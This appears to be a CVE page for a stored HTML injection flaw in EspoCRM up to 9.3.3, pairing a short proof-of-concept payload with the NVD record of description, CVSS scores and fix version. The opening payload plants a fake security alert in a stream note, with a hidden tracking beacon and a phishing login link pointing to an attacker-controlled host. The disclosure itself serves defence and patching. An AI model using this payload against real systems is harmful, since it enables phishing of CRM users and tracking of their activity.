CVE-2026-33657

<!-- PoC for CVE-2026-33657 Stored HTML Injection --> <!-- 1. Attacker creates a new Stream Note in EspoCRM --> <!-- 2. Inserts the following payload in the 'post' field --> <div style="background-color:#f0f0f0;padding:10px;border:1px solid #ccc;"> <h3>System Security Alert</h3> <p>Your account requires immediate verification.</p> <!-- Image beacon for tracking --> <img src="http://attacker-controlled-server.com/track.php?user={victim_id}" width="1" height="1" style="display:none;"> <!-- Malicious link for phishing --> <a href="http://attacker-controlled-server.com/login.php">Click here to verify your account</a> </div> <!-- 3. Attacker uses @mention to target a specific user (e.g., @admin) --> <!-- 4. The system sends an email notification rendering the HTML above -->

{"cve": {"id": "CVE-2026-33657", "sourceIdentifier": "[email protected]", "published": "2026-04-13T20:16:34.143", "lastModified": "2026-04-22T00:10:21.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below have a stored HTML injection vulnerability that allows any authenticated user with standard (non-administrative) privileges to inject arbitrary HTML into system-generated email notifications by crafting malicious content in the post field of stream activity notes. The vulnerability exists because server-side Handlebars templates render the post field using unescaped triple-brace syntax, the Markdown processor preserves inline HTML by default, and the rendering pipeline explicitly skips sanitization for fields present in additionalData, creating a path where attacker-controlled HTML is accepted, stored, and rendered directly into emails without any escaping. Since the emails are sent using the system's configured SMTP identity (such as an administrative sender address), the injected content appears fully trusted to recipients, enabling phishing attacks, user tracking via embedded resources like image beacons, and UI manipulation within email content. The @mention feature further increases the impact by allowing targeted delivery of malicious emails to specific users. This issue has been fixed in version 9.3.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.3.4", "matchCriteriaId": "C81517CA-6567-41DC-A0A9-309FFD7B48E8"}]}]}], "references": [{"url": "https://github.com/espocrm/espocrm/releases/tag/9.3.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/espocrm/espocrm/security/advisories/GHSA-8prm-r5j9-j574", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/espocrm/espocrm/security/advisories/GHSA-8prm-r5j9-j574", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}